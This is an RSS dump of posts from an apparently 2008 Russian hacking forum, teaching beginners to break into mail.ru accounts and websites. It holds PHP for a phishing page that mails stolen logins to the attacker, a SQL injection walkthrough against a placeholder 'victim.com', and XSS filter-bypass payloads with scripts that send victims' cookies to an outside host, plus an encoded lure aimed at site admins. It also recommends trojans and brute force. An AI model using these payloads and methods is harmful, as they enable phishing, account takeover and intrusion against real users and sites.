http://xakearth.mybb.ru/ XAK-EARTH ru-ru Fri, 14 Nov 2008 23:35:58 +0300 MyBB/mybb.ru http://xakearth.mybb.ru/viewtopic.php?pid=6#p6 <p>Здравствуйте! Сегодня мы будем рассматривать взлом почты mail.ru с помощью фейка. Фейк - это поддельная(копия) программа или web-страница, предназначенная для &quot;выманивания&quot; приватной информации(например пароль), а фишка нашего фейка такова - при вводе пароля и e-mail'а в наш фейк, они присылаются нам на почту и записываются в файл &quot;c&quot;.Качаем фейк по ссылке <a href="http://slil.ru/26334138" rel="nofollow" target="_blank">http://slil.ru/26334138</a> . Теперь открываем файл , и видим там следующий код </p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 10.5em"><pre>$from = &quot;admin@mail.ru&quot;; // от кого письмо $to = &quot;ocharovylya@list.ru&quot;; // кому присылаем данные $subj = &quot; Пароль от ящика: $Login@$Domain&quot;; // тема письма $body = &quot; Логин: $Login@$Domain \n Пароль: $Pass&quot;; // тело письма (реконмендую не менять)</pre></div></div></div><p>и меняем данные на свои(данные могут быть любые, даже отправитель ;) ). Теперь изменяем файл &quot;c&quot; на файл c.txt, а в 0144887.php ищем </p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 7.5em"><pre>$fp = fopen(&quot;c&quot;,&quot;a+&quot;); //открываем файл fwrite($fp,&quot;\n [start-- $c -- end] \n&quot;); //записываем всё fclose($fp); //закрываем</pre></div></div></div><p>меняем &quot;c&quot; на &quot;c.txt&quot;. Теперь идём на 110mb.com, и регаем там аккаунт(ВНИМАНИЕ! При регистрации используйте мыло на Рамблере, т.к Mail.Ru не катит). и заливаем туда весь фейк)). Если 110mb начнет орать типа &quot;c.txt имеет недопустимый размер файла&quot;, то проигнорируйте. Фейк готов=), теперь требуется просто &quot;заманить&quot; жертву на наш фейк. Пароли будут сливатся сюда адресфейка.110mb.com/c.txt .</p> mybb@mybb.ru (HACK_ER) Fri, 14 Nov 2008 23:35:58 +0300 http://xakearth.mybb.ru/viewtopic.php?pid=6#p6 http://xakearth.mybb.ru/viewtopic.php?pid=5#p5 <p>Билдер фейка м-агента 5.2<br />====================<br /><strong>СКАЧАТЬ</strong>-http://delphihacker.ucoz.net/programs/BuilderFakeMAgent5.2bySin3vv1.0.rar<br />====================<br />Подробное описание - <a href="http://delphihacker.ucoz.net/news/2008-09-16-16" rel="nofollow" target="_blank">http://delphihacker.ucoz.net/news/2008-09-16-16</a></p> mybb@mybb.ru (HACK_ER) Fri, 14 Nov 2008 23:06:38 +0300 http://xakearth.mybb.ru/viewtopic.php?pid=5#p5 http://xakearth.mybb.ru/viewtopic.php?pid=4#p4 <p>Здравствуйте, уважаемые читатели. Перед вами пошаговое руководство по SQL Injection для новичков. Здесь я попытаюсь очень просто объяснить как украсть нужную нам информацию.</p> <p>Эта статья&#160; является как бы итогом множества других статей, вопросов, ответов, практики итд итп. Написал я эту статью чтобы хоть как то облегчить труды новичков в нашем нелегком деле.<br />Итак, начнем.<br />----------------------<br />ОБНАРУЖЕНИЕ<br />----------------------<br />Предположим у нас есть цель взломать тот или иной сайт. Иными словами у нас есть жертва. Пусть это будет <a href="http://www.victim.com" rel="nofollow" target="_blank">http://www.victim.com</a>. Как узнать можно ли провести SQL Injection? Чтобы провести иньекцию надо сначала найти скрипт в котором есть нефильтруемая переменая. Предроложим на сайте есть скрипт news.php через который выводятся, например новости. Предположим у нас есть ссылка на &quot;Новость #1&quot;, и ссылка эта такого вида:<br /><a href="http://www.victim.com/news.php?id=1." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1.</a><br />Есть также ссылка на &quot;Новость #2&quot; имеющяя сылку вида:<br /><a href="http://www.victim.com/news.php?id=2." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=2.</a></p> <p>Признак возможности провести по SQL Injection номер 1:<br />В адресной строке вместо этого адреса<br /><a href="http://www.victim.com/news.php?id=1" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1</a><br />вот этот<br /><a href="http://www.victim.com/news.php?id=1'." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1'.</a><br />Если на экран&#160; выводится сообщение об ошибке такого:<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY ndate DESC LIMIT 0, 5' at line 1<br />или такого вида*:<br />Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/lol/data/www/www.victim.com/news/news.php on line 569<br />то SQL Injection возможна.</p> <p>Признак возможности провести по SQL Injection номер 2:<br />Если содержимое<br /><a href="http://www.victim.com/news.php?id=1" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1</a><br />то же что и у<br /><a href="http://www.victim.com/news.php?id=2-1" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=2-1</a><br />то SQL Injection возможна.</p> <p>Из всего этого понятно что нефильтруемая переменая id и именно ей мы будем присваивать наши запросы.</p> <p>---------<br />ПОЛЯ<br />---------<br />Для начала мы должны узнать количество полей в таблице и узнать значение какого поля высвечивается, чтобы потом через это поля выудить информацию.<br />Сделать это можно двумя способами.<br />Способ первый:<br />Банально перебирая количество полей, пока сообщение об ошибке не исчезнет. Пример:<br /><a href="http://www.victim.com/news.php?id=1+union+select+1,2,3,4/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+uni &#8230; +1,2,3,4/*</a> и так далее.</p> <p>Способ второй:<br />С помощью оператора ORDER BY, который формирует порядок сортировки полей по номеру (и не только), поля, т.е если выражение:<br /><a href="http://www.victim.com/news.php?id=1+order+by+5/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+order+by+5/*</a><br />не выдаст ошибку - это значит что в запросе используется как минимум 5 полей. Ввожу еще одно выражение:<br /><a href="http://www.victim.com/news.php?id=1+order+by+13/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+order+by+13/*</a><br />Это выражение выполнится с ошибкой, т.к. 13 -го поля не существует и теперь нам известно что полей в выражении не меньше 5 и не больше 12. Выбираю любое число из этого диапазона (примерно среднее):<br /><a href="http://www.victim.com/news.php?id=1+order+by+8/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+order+by+8/*</a><br />Ошибки нет, а это значит что количество полей находится в диапазоне от 8 до 12, Еще раз:<br /><a href="http://www.victim.com/news.php?id=1+order+by+10/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+order+by+10/*</a><br />Ошибка!. т.е количество полей или 8 или 9, остается только попробывать:<br /><a href="http://www.victim.com/news.php?id=1+order+by+9/*" rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+order+by+9/*</a><br />Ошибки нет. Т.о. мы узнали что количество полей равно 9.<br />Получаем определенную информацию.<br />Т.к. мы знаем что у нас 9 полей мы можем составить работающее выражение:<br /><a href="http://www.victim.com/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9/*." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+uni &#8230; 6,7,8,9/*.</a></p> <p>Итак, мы узнали количество полей. Их 9. Предположим что высвечивается значения 1, 2 и 3 поля.</p> <p>-----------<br />ИМЕНА<br />-----------<br />Чтобы вытянуть информацию нужно сначала узнать имена таблиц и полей.<br />Ну чтож, начнем.<br />Есть такая замечательная БД INFORMATION_SCHEMA и в ней есть замечательная таблица TABLES и в ней есть замечательные поля TABLE_SCHEMA и TABLE_NAME. Вот с их помощю мы и узнаем имена таблиц. Вот запрос:<br /><a href="http://www.victim.com/news.php?id=1+union+select+table_schema,table_name,3,4,5,6,7,8,9+from+information_schema.tables." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+uni &#8230; ma.tables.</a><br />Теперь в нашем броузере отобрязятся все таблицы Базы Данных.<br />Остается узнать имена полей. Для этого набираем в адресной строке<br /><a href="http://www.victim.com/news.php?id=1+union+select+1,column_name,3,4,5,6,7,8,9+from+information_schema.columns." rel="nofollow" target="_blank">http://www.victim.com/news.php?id=1+uni &#8230; a.columns.</a><br />Как можно увидеть мы поставляем имена полей вместой той цифры которая отображается на экране.<br />-----------<br />ПОСЛЕСЛОВИЕ<br />-----------<br />Также хотелось бы вам рассказать о двух вещях.<br />Первое:оператор LIMIT.<br />Если все проходит не так гладко как хотелось бы то в самом конце запроса мы добавляем LIMIT a,b что означает показать b записей начиная от а.<br />Второе:Коментарий /*.<br />Если и лимит не помог то попробуйте в самом конце запроса поставить символ комментария. Если ставим знак коментария то остальная часть запроса отбрасывается.<br />Вот собственно и все дорогие мои :)<br />-------------<br />БЛАГОДАРНОСТИ<br />-------------<br />Хотелось бы поблагодарить впервую очердь хакзону, потом всех авторов которые публикются на ней, потом всех новичков которые задают вопросы, и конечно всех кто отвечает этим вопросам. Именно благодаря вам была написана эта статья :)<br />Отдельная благодарность Warag a.k.a. EuGen за его терпеливость.<br />Warag a.k.a. EuGen я тя оч-оч уважаю и оч-оч благодарен за все :)<br />Ну и напоследок:<br />Статья не является побуждением к действию. Это только для ознакомительных целей. Автор не несет ответственности за действия которые были после прочтения данной статьи.</p> <p>З.Ы источник - hackzone.ru</p> mybb@mybb.ru (HACK_ER) Fri, 14 Nov 2008 23:03:45 +0300 http://xakearth.mybb.ru/viewtopic.php?pid=4#p4 http://xakearth.mybb.ru/viewtopic.php?pid=3#p3 <p>Привет!!!<br />В этой теме я хочу детально описать Xss от A до Я.<br />На античате много есть инфы по Xss, но ни в 1-ой из них я не нашёл хорошего обяснения для новичков, извините если я ошибаюсь...<br />Статью не полностю написал я, кое-что нашел в инете, и на нашем форуме, за что очень благодарен =)<br />Так что начнём...<br />========================================</p> <p>### Xss это Css =&gt; Cross Site Scripting<br />Чтобы не путать с CSS также назвыают XSS<br />Впервые этот БАГ появился в 1997.</p> <p>========================================</p> <p>### Как используют XSS.</p> <p>Для начала нам нужно знать что такое Cookie.<br />Если вы знаете, можете пропустить.</p> <p>Cookie служат для сохранения учетных данных сайта на компьютере поситителя.<br />Если вы зарегестрировались на сайте под ником 'blabluble', то сайт сохранил у вас на компьютере файл с cookies, где закодированы ваши данные.<br />А если вы есть админ и у вас есть доступ к сайту, а я - юзер, который украл у вас(админа) cookies, то я могу спокойно зайти на сайт, и сайт меня определяет как 'admin' - у меня будут администраторские права.</p> <p>Для смены(подстановки украденных) кук советую использувать прогу CookieEdit для IE или встроенные функции в Опере и Фаерфоксе.</p> <p>========================================<br />Мы разобрались что такое куки идём дальше...<br />Чтобы перехватить cookies надо найти место на сайте, где можно выполнить XSS-атаку.</p> <p>### Что такое XSS-атака?</p> <p>XSS атаки - это атаки не на сам сайт, а на пользователей сайта.<br />XSS - это недоработка в фильтре, приложении.</p> <p>Бывают пассивные XSS и активные XSS.</p> <p>Что такое пассивные XSS?</p> <p>Пассивные - это Xss, которые требуют от жертвы непосредственного участия + есть специфические ограничения и сложности.<br />Поэтому, пассивные XSS не очень ценятся.<br />Например, нужно заставить её пройти по ядовитой ссылке, что потребует социальной инженерии, хитрости.</p> <p>Активные - это XSS, которые, не требуют никаких дополнительных действий со стороны жертвы - ей достаточно лишь открыть страницу с вашим XSS и ява-код выполнится автоматически.<br />Благодаря своей автоматизированности - они очень полезны и ценны.<br />Например, активные хсс существуют в BB-тегах из-за недостаточной фильтрации, когда вы оставляете сообщение на форуме\гостевухе\чате, которое будет всегда активен при каждом обновлении.</p> <p>========================================</p> <p>### Итак, перейду конкретно к тому, как найти в данном сайте XSS.</p> <p>Как я раньше уже писал что XSS состоит из тегов, они же состоят из html, и javascript языка =).</p> <p>Javascript можно вписывать в html.<br />Можно кодировать, чтобы обойти фильтры. Но об этом позже.</p> <p>Как узнать, что XSS на даном сайте проходит?<br />Ужасна распрастраннёная узявимость типа<br />&lt;script&gt;alert()&lt;/script&gt; Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился.</p> <p>Самая распостраненая XSS (наблюдаеться во всех местах где плохая фильтрация):<br />&quot;&gt;&lt;script&gt;alert()&lt;/script&gt;<br />Вся суть в &quot;&gt; .<br />Давайте подумаем, что мы делаем, когда вводим в поле &quot;&gt;&lt;script&gt;alert()&lt;/script&gt; , что происходит?<br />Мы вводим в форму &quot;&gt;&lt;script&gt;alert()&lt;/script&gt; какой-то переменной присваиваеться значение поля. Переменная обрабатывается, &quot;&gt; выполняеться, закрывает<br />скрипт и выпролняет &lt;script&gt;alert()&lt;/script&gt;</p> <p>Эта XSS самая распостраненая в поисковиках:<br />Просматриваем все поля сайта и пытаемся вставить &quot;&gt;&lt;script&gt;alert()&lt;/script&gt;<br />Если вышло сообщение - вы нашли XSS...</p> <p>========================================</p> <p>### А как определить есть фильтр или нет?</p> <p>Просто в любое поле вводим: '';!--&quot;&lt;fuck&gt;=&amp;{()}<br />Дальше открываем html страничку и ищем слово &quot;fuck&quot;<br />и смотри последующие сиволы..</p> <p>Если &lt;&gt; так и остались то это перваый признак уязвимости - значит фильтр имеет дырку.<br />Если ,&quot;'\ символы остались такими, как были введены - это второй признак уязвимости - возможные дополнительные символы к последующей XSS атаке.<br />Затем, если открыв HTML, вы не обнаружили &lt;&gt; то скорее всего дырка в фильтре.<br />Если открыв HTML вы обнаружили, что &lt;&gt; заменены на другие символы, то это облом - фильтр по крайней<br />мере функционирует нормально.<br />Возможно еще ввести в поле для проверки фильтрации вот так: &quot;&gt;&lt;&gt;'&quot;`,/\?@%</p> <p>Рассмотрим случай если фильтр съедает &lt;&gt;</p> <p>В этом случае существует вероятность дырки.<br />К примеру, у фильтра условие съедать &lt;script&gt;,&lt;&gt; и .<br />Тогда пробуем &lt;zxcvbnzxc792&gt; и смотрим, если не съелось - нашли дырку...дальше можно составить боевой XSS-скрипт.</p> <p>Ещe существует метод вложенного скрипта, к примеру вот так:<br />&lt;sc&lt;script&gt;ript&gt;alert()&lt;/sc&lt;/script&gt;ript&gt;<br />это, если фильтр не оч. сильный и плохо фильтрует.</p> <p>Еще можно попробовать во так:<br />&gt;&gt;&gt;&gt;&lt;&lt;script бывает, что фильтр подсчитывает откр. и закр. скобки и закрывает сам. Сначало фильтрует, а потом закрывает... что дает нам дырку к инъекции скрипта.</p> <p>Частенько бывает что фильтр дополняет скрипт, к примеру вот этим :<br />&quot;&gt;<br />http://******.ru/trye.asp?sessionID=&quot;&gt;&lt;IMG%20SRC=&quot;javascript:alert();</p> <p>Фильтр смотрит, что ничего опасного в &lt;IMG%20SRC=&quot;javascript:alert(); нет, закрывает и тем самым<br />выполняя скрипт.</p> <p>Еще конечно если фильтр не фильтрует различные кодировки то можно попытаться закодировать скрипт и вставить код.</p> <p>Все надо пытаться методом проб и ошибок искать...<br />Пытаться вводить в поля и внимательно просматривать что мы получили от фильтра.<br />Методом тыков понять, как фильтр работает, есть ли у него недоработки.<br />Если фильтр плохой, мы всегда можем вставить скрипты.</p> <p>========================================</p> <p>### Активные XSS</p> <p>Тут надо использовать разрешенные теги и прекрываясь ими, надо выполнить запрос.</p> <p>Например, теги url,bb,img.<br />Весь смысл вставки заключается в том, что нам надо встроить запрос в париметр img или url. У Img есть много парметров кроме src и alt.<br />Этот баг очень часто используется на форуме, в гостевухах...</p> <p>Рассмотрим активные XSS.</p> <p>Предупреждения!!!<br />Теги [fon*t],[im*g],[ur*l] пишутса с * для того, штобы они не использовались данным форумом.<br />Для использувания этих тегов удалите *.</p> <p>К примеру просмотрим форум на наличие использования тегов [fon*t],[im*g],[ur*l] и попытаться вставить в них скрипт или комбинировать их.:</p> <p>[im*g]httр://www.qwewqw.ru/1.jpg[/im*g]Выходит крестик...значит img используется и мы его подобрали (просто дело в том, что бывает img включен, а админы из создания сообщения его убирают, мол картинки вставлять нельзя и бывает он в использовании<br />разной формы) если крестика нет...а висит всего надпись, то попробуйте еще так:<br />[im*g src=httр://www.qwewqw.ru/1.jpg]</p> <p>Ну так вот к примеру мы добились крестика этим:<br />[im*g]httр://www.qweqw.ru/1.jpg[/im*g]</p> <p>Проверим держит ли фильтр пробел, добавляем пробел после расширения jpg :<br />[im*g]httр://www.qweqw.ru/1.jpg [/im*g]<br />если крестик есть - тогда всё ОК.</p> <p>Далее существуют у img параметры dynsrc и lowsrc которые держат яваскрипт. Пытаемся к примеру вставить:<br />[im*g]http://www.qwewqw.ru/1.jpg dynsrc=javascript:alert()[/im*g]<br />проверяем, отсылаем - появиться сообщение - значит нашли активную XSS и вместо alert() можете вставить любой скрипт.</p> <p>Если фильтр не сдался попробуйте так:<br />[im*g]http://www.qweqw.ru/&quot;/dynsrc=&quot;javascript:alert()&quot;/1.jpg[/im*g]<br />и<br />[im*g]http://www.qwewqw.ru/&quot;/dynsrc=javascript:alert()/1.jpg[/im*g]</p> <p>Если с приведённых примеров получился крестик, то httр://www.qweqw.ru/1.jpg заменяем на адрес сниффера.</p> <p>Бывают случаи, когда jpg отключен админом.</p> <p>========================================</p> <p>###Мы всё время делали коды типа:</p> <p>&lt;script&gt;alert('HakNet')&lt;/script&gt;<br />javascript:alert('HakNet')<br />javascript:alert('HakNet')/1.jpg и так далие..<br />Но они никакой пользы не принесли, это просто коды для проверки(тестировки) на Xss.</p> <p>Вот скрипт:<br />&lt;script&gt;<br />img = new Image();<br />img.src = &quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;<br />&lt;/script&gt;<br />Он уже ворует куки =)</p> <p>========================================</p> <p>###Как его подставить к ссылке с Xss?</p> <p>Да очень легко...<br />Есть несколко вариантов:</p> <p>- 1)делаем вот так:<br />http://*****.ru/free?p='&gt;&lt;script&gt;img=new Image();img.src=&quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;&quot;+document.cookie;&lt;/script&gt;<br />где **** сайт с Xss.</p> <p>Вот сам составленый скрипт:<br />'&gt;&lt;script&gt;img = new Image();img.src=&quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;&lt;/script&gt;</p> <p>- 2)Можно ещё делать вот так:<br />http://*****.ru/free?p='&gt;&lt;script src=http://haknet.h16.ru/script/js.js&gt;&lt;/script&gt;<br />где обращаетса к <a href="http://haknet.h16.ru/script/js.js" rel="nofollow" target="_blank">http://haknet.h16.ru/script/js.js</a></p> <p>а в js.js есть:<br />img=new Image();img.src=&quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;<br />этот способ более надёжен.</p> <p>Но как я уже писал - иногда бывают затруднения с фильтрами на сайте (не прокатывает наш скрипт).<br />Тогда нужно подумать, как его обойти.<br />Можно просто нечто добавить, нечто поменять, или удалить в скрипте.<br />Но есть более надёжным вариант, когда мы просто закодируем скрипт. Для этого есть много прог.<br />Есть такой сайт как <a href="http://ha.ckers.org/xss.html" rel="nofollow" target="_blank">http://ha.ckers.org/xss.html</a> (кодировщик-дэкодировщик).</p> <p>Вот пример:<br />%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E</p> <p>это был закодированный:</p> <p>http://*****.ru/free?p='&gt;&lt;script src=http://haknet.h16.ru/script/js.js&gt;&lt;/script&gt;</p> <p>- 3) Особенно шифрование необходимо не только для обмана фильтров, но и для обмана АДМИНА при использовании ПАССИВНОЙ ХСС.</p> <p>Вот такой пример на основе социальной инженерии.<br />Ищем контакт с админом форума бросаем в форуме ему линк на свой сайт, и говориш типа так &quot;клевая фича есть на сайте&quot; и так дале в том же духе.<br />А на нашем сайте будет как вы уже догадались =) вот ето скрипт:</p> <p>&lt;script language=&quot;JavaScript&quot;&gt;<br />document.location.href=&quot;%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&quot;<br />&lt;/script&gt;</p> <p>Что делает document.location.href вы спросите меня? )).. это ява-код, который без запроса переходит на указаной сайт Так чо ж у нас получается, дали мы линк админу, и он зашел на наш сайт, вот что делается.. его быстро бросает на</p> <p>%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E<br />а это уже и есть наш Xss в зашифрованом виде.</p> <p>Примечание: это подействует только тогда, когда Xss будет принадлежать админу сайта которому вы бросили линк...<br />Иными словами ТРУДНОСТЬ ПАССИВНОЙ ХСС состоит в том, что уязвимость может быть использована ТОЛЬКО, если жертва АВТОРИЗОВАНА на уязвимом сайте!!!</p> <p>========================================<br />P.S Источник - Old.Antichat.Ru</p> mybb@mybb.ru (HACK_ER) Fri, 14 Nov 2008 23:00:58 +0300 http://xakearth.mybb.ru/viewtopic.php?pid=3#p3 http://xakearth.mybb.ru/viewtopic.php?pid=2#p2 <p>Многих мучает вопрос - &quot;Как взломать ящик на mail.ru?&quot;. В Интернете очень много говорится о том что есть робот, который восстанавливает пароли, но надо и свой пароль прислать на мыло робота, чтоб его ввести в замешательство. Все это ЛОХОТРОН! Таким образом тот умник, который написал статью о роботе просто-напросто выманивает ваш пароль от ящика! В этой статье я вам расскажу какие основые способы взлома паролей существуют... Итак, начнем</p> <p><strong>Социальная Инженерия (далее СИ)</strong> - Социальная Инженерия (сокращенно СИ) это нетехнический метод взлома, тоесть психологический. Для этого надо заставить жертву сказать ее пароль (или ответ на секретный вопрос), и чтобы жертва при этом не подозревала что ее хотят хакнуть. Например если секретный вопрос &quot;Как зовут мою кошку&quot;, вы разговариваете с жертвой, поднимаете тему о домашних животный, и спрашиваете &quot;А как твою кошку зовут&quot;, и он отвечает.... ответ на Секретный вопрос у НАС!!</p> <p><strong>Трой(или шпионские проги)</strong> - для этого надо подсунуть жертве троян, который пришлет вам пароль от ящика на почту.. Трояны обычно делают на проге Pinch3(скачать можно в Интернете). Чтобы ее найти юзайте Google... Но почти все антивирусы палят эти трои, но конечно есть множество способов замаскировать их от антивирей, поэтому трои это хороший вариант....</p> <p><strong>Брутфорс</strong> - это самый неэффективный метод взлома паролей, просто-напросто тупой перебор паролей. Самый лучший брутфорс считается Brutus AET2 (скачать ее можно в нашем каталоге файлов).</p> <p><strong>XSS</strong> - это нахождение багов в веб-интерфейсе. Для того чтобы cookies жертвы пришли вам надо найти XSS. Об этом способе я вам расскажу в следующих статьях.</p> <p><span style="font-style: italic">P.S Все вышеперечисленные способы действуют не только на mail.ru</span></p> mybb@mybb.ru (HACK_ER) Fri, 14 Nov 2008 22:49:30 +0300 http://xakearth.mybb.ru/viewtopic.php?pid=2#p2